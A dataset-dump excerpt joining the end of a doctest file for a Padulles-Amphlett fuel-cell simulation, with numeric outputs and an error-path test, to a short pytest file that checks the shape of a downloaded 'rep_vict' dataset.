Eta Activation : 0.3769483587657406 V
Eta Concentration : 0.0003547094700620668 V
Eta Ohmic : 0.003176255519565377 V
FC Efficiency : 0.5341016324451575
FC Power : 7.498786919530012 W
FC Voltage : 4.165992733072229 V
Loss : 0.380479323755368 V
PH2 : 0.19693188584535729 atm
PH2O : 0.24238917024210727 atm
PO2 : 0.19049151038892673 atm
Power-Thermal : 3.5712130804699886 W
###########
I : 1.9
E : 6.068387813188879 V
Eta Activation : 0.38052969267197334 V
Eta Concentration : 0.0003746674093630815 V
Eta Ohmic : 0.0033538152156708046 V
FC Efficiency : 0.5316790944492106
FC Power : 7.879484179737301 W
FC Voltage : 4.147096936703843 V
Loss : 0.38425817529700723 V
PH2 : 0.1969178354637429 atm
PH2O : 0.24237187664677873 atm
PO2 : 0.19048357755072845 atm
Power-Thermal : 3.8055158202626993 W
###########
I : 2.0
E : 6.0683862744646095 V
Eta Activation : 0.3839273955127959 V
Eta Concentration : 0.00039465233709598025 V
Eta Ohmic : 0.003531492225469087 V
FC Efficiency : 0.5293741761651032
FC Power : 8.25823714817561 W
FC Voltage : 4.129118574087805 V
Loss : 0.387853540075361 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 4.041762851824391 W
###########
I : 2.1
E : 6.068384735676256 V
Eta Activation : 0.38715939375662295 V
Eta Concentration : 0.00041466432635066115 V
Eta Ohmic : 0.0037092867838082735 V
FC Efficiency : 0.5271753860695316
FC Power : 8.635132823818928 W
FC Voltage : 4.111968011342347 V
Loss : 0.3912833448667819 V
PH2 : 0.19688973470051413 atm
PH2O : 0.24233728945612165 atm
PO2 : 0.19046771187433184 atm
Power-Thermal : 4.279867176181073 W
###########
I : 2.2
E : 6.068383196823811 V
Eta Activation : 0.39024111055794025 V
Eta Concentration : 0.0004347034505143372 V
Eta Ohmic : 0.0038871991293599716 V
FC Efficiency : 0.5250728373249665
FC Power : 9.010249888496427 W
FC Voltage : 4.095568131134739 V
Loss : 0.39456301313781456 V
PH2 : 0.19687568431889974 atm
PH2O : 0.2423199958607931 atm
PO2 : 0.1904597790361335 atm
Power-Thermal : 4.519750111503576 W
###########
I : 2.3
E : 6.068381657907269 V
Eta Activation : 0.39318591119501267 V
Eta Concentration : 0.00045476978327314626 V
Eta Ohmic : 0.004065229504538212 V
FC Efficiency : 0.5230579622427114
FC Power : 9.383659842634243 W
FC Voltage : 4.079852105493149 V
Loss : 0.397705910482824 V
PH2 : 0.19686163393728537 atm
PH2O : 0.24230270226546458 atm
PO2 : 0.19045184619793523 atm
Power-Thermal : 4.761340157365757 W
###########
I : 2.4
E : 6.068380118926627 V
Eta Activation : 0.3960054536369255 V
Eta Concentration : 0.00047486339861378836 V
Eta Ohmic : 0.004243378155424144 V
FC Efficiency : 0.5211232875604884
FC Power : 9.755427943132343 W
FC Voltage : 4.06476164297181 V
Loss : 0.40072369519096346 V
PH2 : 0.19684758355567097 atm
PH2O : 0.242285408670136 atm
PO2 : 0.1904439133597369 atm
Power-Thermal : 5.004572056867657 W
###########
I : 2.5
E : 6.068378579881878 V
Eta Activation : 0.39870996749954657 V
Eta Concentration : 0.000494984370825149 V
Eta Ohmic : 0.00442164533169592 V
FC Efficiency : 0.5192622556245563
FC Power : 10.12561398467885 W
FC Voltage : 4.05024559387154 V
Loss : 0.4036265972020676 V
PH2 : 0.19683353317405658 atm
PH2O : 0.24226811507480747 atm
PO2 : 0.19043598052153862 atm
Power-Thermal : 5.249386015321152 W
###########
I : 2.6
E : 6.068377040773017 V
Eta Activation : 0.40130847825734167 V
Eta Concentration : 0.0005151327744999589 V
Eta Ohmic : 0.004600031286563196 V
FC Efficiency : 0.5174690806642298
FC Power : 10.494272955870581 W
FC Voltage : 4.036258829180992 V
Loss : 0.40642364231840483 V
PH2 : 0.19681948279244216 atm
PH2O : 0.2422508214794789 atm
PO2 : 0.1904280476833403 atm
Power-Thermal : 5.495727044129421 W
###########
I : 2.7
E : 6.068375501600038 V
Eta Activation : 0.4038089891176398 V
Eta Concentration : 0.0005353086845364485 V
Eta Ohmic : 0.004778536276705824 V
FC Efficiency : 0.5157386322058496
FC Power : 10.861455594255196 W
FC Voltage : 4.022761331205627 V
Loss : 0.40912283407888206 V
PH2 : 0.19680543241082776 atm
PH2O : 0.24223352788415034 atm
PO2 : 0.190420114845142 atm
Power-Thermal : 5.7435444057448075 W
###########
I : 2.8
E : 6.068373962362936 V
Eta Activation : 0.40621862980268425 V
Eta Concentration : 0.000555512176140013 V
Eta Ohmic : 0.004957160562216277 V
FC Efficiency : 0.5140663396997094
FC Power : 11.227208859041653 W
FC Voltage : 4.0097174496577335 V
Loss : 0.41173130254104057 V
PH2 : 0.1967913820292134 atm
PH2O : 0.2422162342888218 atm
PO2 : 0.19041218200694368 atm
Power-Thermal : 5.992791140958347 W
###########
I : 2.9
E : 6.068372423061707 V
Eta Activation : 0.4085437792118771 V
Eta Concentration : 0.0005757433248249061 V
Eta Ohmic : 0.005135904406545483 V
FC Efficiency : 0.5124481138904448
FC Power : 11.591576336201861 W
FC Voltage : 3.997095288345469 V
Loss : 0.4142554269432475 V
PH2 : 0.196777331647599 atm
PH2O : 0.24219894069349326 atm
PO2 : 0.1904042491687454 atm
Power-Thermal : 6.24342366379814 W
###########
I : 3.0
E : 6.0683708836963435 V
Eta Activation : 0.4107901672807063 V
Eta Concentration : 0.0005960022064159204 V
Eta Ohmic : 0.005314768076451755 V
FC Efficiency : 0.5108802815228812
FC Power : 11.95459858763542 W
FC Voltage : 3.9848661958784737 V
Loss : 0.41670093756357396 V
PH2 : 0.1967632812659846 atm
PH2O : 0.24218164709816473 atm
PO2 : 0.19039631633054707 atm
Power-Thermal : 6.49540141236458 W
###########
I : 3.1
E : 6.068369344266841 V
Eta Activation : 0.4129629601316751 V
Eta Concentration : 0.0006162888970501038 V
Eta Ohmic : 0.0054937518419525275 V
FC Efficiency : 0.5093595307581349
FC Power : 12.316313453731704 W
FC Voltage : 3.9730043399134525 V
Loss : 0.4190730008706778 V
PH2 : 0.19674923088437024 atm
PH2O : 0.2421643535028362 atm
PO2 : 0.1903883834923488 atm
Power-Thermal : 6.748686546268298 W
###########
I : 3.2
E : 6.068367804773196 V
Eta Activation : 0.41506683170178466 V
Eta Concentration : 0.0006366034731784721 V
Eta Ohmic : 0.005672855976278701 V
FC Efficiency : 0.507882865258588
FC Power : 12.676756316854359 W
FC Voltage : 3.9614863490169867 V
Loss : 0.4213762911512418 V
PH2 : 0.19673518050275585 atm
PH2O : 0.24214705990750765 atm
PO2 : 0.19038045065415046 atm
Power-Thermal : 7.003243683145644 W
###########
I : 3.3
E : 6.0683662652154 V
Eta Activation : 0.417106024344736 V
Eta Concentration : 0.0006569460115677318 V
Eta Ohmic : 0.005852080755831333 V
FC Efficiency : 0.5064475653403494
FC Power : 13.035960331860592 W
FC Voltage : 3.950291009654725 V
Loss : 0.42361505111213504 V
PH2 : 0.19672113012114145 atm
PH2O : 0.2421297663121791 atm
PO2 : 0.19037251781595219 atm
Power-Thermal : 7.259039668139408 W
###########
I : 3.4
E : 6.06836472559345 V
Eta Activation : 0.4190844003836543 V
Eta Concentration : 0.0006773165893020328 V
Eta Ohmic : 0.0060314264601405215 V
FC Efficiency : 0.5050511549266622
FC Power : 13.393956628655083 W
FC Voltage : 3.9393990084279658 V
Loss : 0.4257931434330969 V
PH2 : 0.19670707973952706 atm
PH2O : 0.24211247271685057 atm
PO2 : 0.19036458497775385 atm
Power-Thermal : 7.516043371344917 W
###########
I : 3.5
E : 6.068363185907339 V
Eta Activation : 0.42100548618901656 V
Eta Concentration : 0.0006977152837847073 V
Eta Ohmic : 0.006210893371826288 V
FC Efficiency : 0.5036913732928463
FC Power : 13.750774490894704 W
FC Voltage : 3.9287927116842014 V
Loss : 0.42791409484462756 V
PH2 : 0.1966930293579127 atm
PH2O : 0.24209517912152204 atm
PO2 : 0.19035665213955555 atm
Power-Thermal : 7.774225509105296 W
###########
I : 3.6
E : 6.068361646157063 V
Eta Activation : 0.4228725100457559 V
Eta Concentration : 0.0007181421727400468 V
Eta Ohmic : 0.006390481776561363 V
FC Efficiency : 0.5023661507925354
FC Power : 14.106441514254398 W
FC Voltage : 3.918455976181777 V
Loss : 0.4299811339950573 V
PH2 : 0.1966789789762983 atm
PH2O : 0.2420778855261935 atm
PO2 : 0.19034871930135727 atm
Power-Thermal : 8.033558485745605 W
###########
I : 3.7
E : 6.068360106342617 V
Eta Activation : 0.4246884348310017 V
Eta Concentration : 0.0007385973342150736 V
Eta Ohmic : 0.00657019196303564 V
FC Efficiency : 0.50107358791043
FC Power : 14.460983747095012 W
FC Voltage : 3.9083739857013544 V
Loss : 0.4319972241282524 V
PH2 : 0.1966649285946839 atm
PH2O : 0.24206059193086493 atm
PO2 : 0.19034078646315894 atm
Power-Thermal : 8.29401625290499 W
###########
I : 3.8
E : 6.068358566463993 V
Eta Activation : 0.4264559863331208 V
Eta Concentration : 0.0007590808465813247 V
Eta Ohmic : 0.006750024222922298 V
FC Efficiency : 0.49981193710908595
FC Power : 14.814425815913308 W
FC Voltage : 3.8985331094508706 V
Loss : 0.43396509140262446 V
PH2 : 0.19665087821306954 atm
PH2O : 0.2420432983355364 atm
PO2 : 0.19033285362496066 atm
Power-Thermal : 8.555574184086693 W
###########
I : 3.9
E : 6.068357026521189 V
Eta Activation : 0.42817767789163225 V
Eta Concentration : 0.0007795927885366656 V
Eta Ohmic : 0.006929978850845375 V
FC Efficiency : 0.49857958703411753
FC Power : 15.166791037577857 W
FC Voltage : 3.888920778866117 V
Loss : 0.4358872495310143 V
PH2 : 0.19663682783145514 atm
PH2O : 0.24202600474020786 atm
PO2 : 0.19032492078676233 atm
Power-Thermal : 8.818208962422144 W
###########
Report is generating ...
Done!
>>> Padulles_Amphlett_Data["Status"]
True
>>> Padulles_Amphlett_Data["P"][5]
2.724941943281497
>>> Padulles_Amphlett_Data["I"][5]
0.6
>>> Padulles_Amphlett_Data["V"][5]
4.541569905469162
>>> Padulles_Amphlett_Data["EFF"][5]
0.5822525519832258
>>> Padulles_Amphlett_Data["PO2"][5]
0.1905867044473064
>>> Padulles_Amphlett_Data["PH2"][5]
0.19710049042472996
>>> Padulles_Amphlett_Data["PH2O"][5]
0.2425966933860498
>>> Padulles_Amphlett_Data["Ph"][5]
0.9650580567185031
>>> Padulles_Amphlett_Data["VE"][5]
4.553525621759973
>>> Padulles_Amphlett_Data["V0"]
4.698326931114575
>>> Padulles_Amphlett_Data["K"]
-0.24133551559100302
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)
>>> Padulles_Amphlett_Data["Status"]
False
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)
2.9
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)
[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.14455344314445 V
Eta Activation : 0.9092187394310518 V
Eta Concentration : 1.1361117401857817e-07 V
Eta Ohmic : 4.63717533307516e+269 V
FC Efficiency : -2.9725482904327946e+269
FC Power : -2.3185876665375803e+269 W
FC Voltage : -2.3185876665375803e+270 V
Loss : 4.63717533307516e+269 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 2.3185876665375803e+269 W
###########
I : 2.0
E : 6.144553272737403 V
Eta Activation : 0.9103753288368093 V
Eta Concentration : 2.301179808139826e-06 V
Eta Ohmic : 9.331810347802308e+270 V
FC Efficiency : -5.981929710129684e+270
FC Power : -9.331810347802308e+271 W
FC Voltage : -4.665905173901154e+271 V
Loss : 9.331810347802308e+270 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 9.331810347802308e+271 W
###########
I : 4.0
E : 6.144553093215826 V
Eta Activation : 0.9106431331307118 V
Eta Concentration : 4.6654999364844955e-06 V
Eta Ohmic : 1.8785852500552963e+271 V
FC Efficiency : -1.2042213141380103e+271
FC Power : -3.757170500110593e+272 W
FC Voltage : -9.392926250276482e+271 V
Loss : 1.8785852500552963e+271 V
PH2 : 0.19662277744984075 atm
PH2O : 0.24200871114487932 atm
PO2 : 0.19031698794856405 atm
Power-Thermal : 3.757170500110593e+272 W
###########
Report is generating ...
Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs
Done!
>>> shutil.rmtree("Padulles-Amphlett")
'''
|
tests/r/test_rep_vict.py | hajime9652/observations | 199 | 12797520 | <filename>tests/r/test_rep_vict.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.rep_vict import rep_vict
def test_rep_vict():
"""Test module rep_vict.py by downloading
rep_vict.csv and testing shape of
extracted data has 8 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = rep_vict(test_path)
try:
assert x_train.shape == (8, 8)
except:
shutil.rmtree(test_path)
raise()
|
Subsets and Splits